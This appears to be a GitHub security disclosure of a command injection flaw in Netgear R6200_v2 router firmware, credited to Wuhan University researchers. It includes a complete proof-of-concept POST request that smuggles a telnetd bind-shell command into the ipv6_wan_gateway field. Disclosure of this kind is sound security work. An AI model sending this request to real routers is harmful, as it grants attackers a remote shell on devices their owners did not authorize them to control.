Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

Command injection vulnerability in Netgear R6200_v2 router

Basic information

Vulnerability description

Vulnerability exists in the binary /sbin/acos_service in all R6200_v2 firmware versions including the latest R6200v2-V1.0.3.12. It might also infect some other products, which is recently not analyzed.
Taking the latest R6200_V2_1.0.3.12 firmware as an example, the variable ipv6_wan_gateway located at offset 0x19B98 is passed into a sprintf function by the format string %s. Then, the value is passed to a system, which leads to a command injection vulnerability. The disassemble code and the c code are presented below:
disassemble code of the vulnerable place
c code of the vulnerable place
Through further attemps, we found that remote authenticated attackers can modify the value of the vulnerable parameter in website http://192.168.1.1/IPV6_fixed.htm by sending a modified request. As the vulnerable parameter is directly saved in nvram after sending the request, attackers can then execute arbitrary remote command as they controlled the parameter of a system call.
After visiting the web page and sending a POST request, if we set the ipv6_wan_gateway parameter of the request to be %24%28telnetd+-l+%2Fbin%2Fsh+-p+1234+-b+0.0.0.0%29, we can actually execute command which $(telnetd -l /bin/sh -p 1234-b 0.0.0.0).
A potential PoC is shown below:

POST /ipv6_fix.cgi?id=2068267834 HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 1087
Origin: http://192.168.1.1
Authorization: Basic YWRtaW46YWRtaW4x
Connection: close
Referer: http://192.168.1.1/IPV6_fixed.htm
Cookie: XSRF_TOKEN=1222440606
Upgrade-Insecure-Requests: 1
apply=Apply&login_type=Fixed&IPv6WanAddr1=2001&IPv6WanAddr2=3CA2&IPv6WanAddr3=010F&IPv6WanAddr4=00A1&IPv6WanAddr5=121C&IPv6WanAddr6=0000&IPv6WanAddr7=0000&IPv6WanAddr8=0010&ProfixWanLength=6&IPv6Gateway1=2001&IPv6Gateway2=3CA2&IPv6Gateway3=010F&IPv6Gateway4=00A1&IPv6Gateway5=121C&IPv6Gateway6=0000&IPv6Gateway7=0000&IPv6Gateway8=0002&DAddr1=&DAddr2=&DAddr3=&DAddr4=&DAddr5=&DAddr6=&DAddr7=&DAddr8=&PDAddr1=&PDAddr2=&PDAddr3=&PDAddr4=&PDAddr5=&PDAddr6=&PDAddr7=&PDAddr8=&IpAssign=auto&IPv6LanAddr1=3113&IPv6LanAddr2=3CA2&IPv6LanAddr3=010F&IPv6LanAddr4=001A&IPv6LanAddr5=121B&IPv6LanAddr6=0000&IPv6LanAddr7=0000&IPv6LanAddr8=0001&ProfixLanLength=6&ipv6_wan_ipaddr=2001%3A3CA2%3A010F%3A00A1%3A121C%3A0000%3A0000%3A0010&ipv6_lan_ipaddr=3113%3A3CA2%3A010F%3A001A%3A121B%3A0000%3A0000%3A0001&ipv6_wan_length=6&ipv6_lan_length=6&ipv6_pri_dns=%3A%3A%3A%3A%3A%3A%3A&ipv6_sec_dns=%3A%3A%3A%3A%3A%3A%3A&ipv6_wan_gateway=%24%28telnetd+-l+%2Fbin%2Fsh+-p+1234+-b+0.0.0.0%29&ipv6_enable_dhcp=&ipv6_proto=fixed

An evidence of the vulnerable is shown below:
reproduction evidence

Acknowledgment

This vulnerability credits to @maybethetricker(Runyuan Mei) and @river-li(Zichuan Li) from Wuhan University.